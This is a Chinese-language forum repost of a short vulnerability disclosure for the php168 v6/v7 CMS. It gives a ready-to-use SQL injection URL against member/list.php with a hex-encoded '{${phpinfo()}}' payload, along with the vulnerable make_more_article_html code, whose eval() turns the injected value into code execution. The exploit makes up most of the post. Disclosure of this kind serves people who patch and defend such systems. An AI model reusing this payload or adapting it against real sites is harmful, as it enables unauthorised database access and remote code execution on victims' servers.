• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    php168 v6/v7鸡肋Getshell安全问题

    发布者: 霞绮2878 | 发布时间: 2025-6-28 23:18| 查看数: 100| 评论数: 0|帖子模式

      刚搜了一下貌似和以前一个漏洞是一个问题。有点鸡肋,需要条件:
      1.网站配置为:文章生成真静态
      2.允许注册会员
      给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。
      member/list.php?step=2&Type=delete&aidDB[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7B247B706870696E666F28297D7D,6,7%23
      0x01 漏洞在make_more_article_html这个函数:
      function make_more_article_html($comebackurl='/',$type='',$aidDB=''){
      global $db,$pre,$webdb,$webdb,$showHtml_Type;
      if($webdb[NewsMakeHtml]!=1||$aidDB=='') // $webdb[NewsMakeHtml] 真静态
      { return ;}
      ...
      $query = $db->query("SELECT A.*,B.bencandy_html,B.list_html,D.aid FROM {$pre}article_db D LEFT JOIN {$pre}article A ON D.aid=A.aid LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE D.aid IN ($string)");
      while($rs = $db->fetch_array($query)){
      ...
      $filename_b=$rs[bencandy_html];
      ...
      eval("\$showurl=\"$filename_b\";");
      ...
      0x02 在 \member\list.php中调用了该漏洞函数:
      if($step==2){
      ...
      if($Type=='delete'){
      make_more_article_html("$FROMURL","del_0",$aidDB);
      by: k4shifz[w.s.t]

    来源:https://www.jb51.net/hack/34748.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表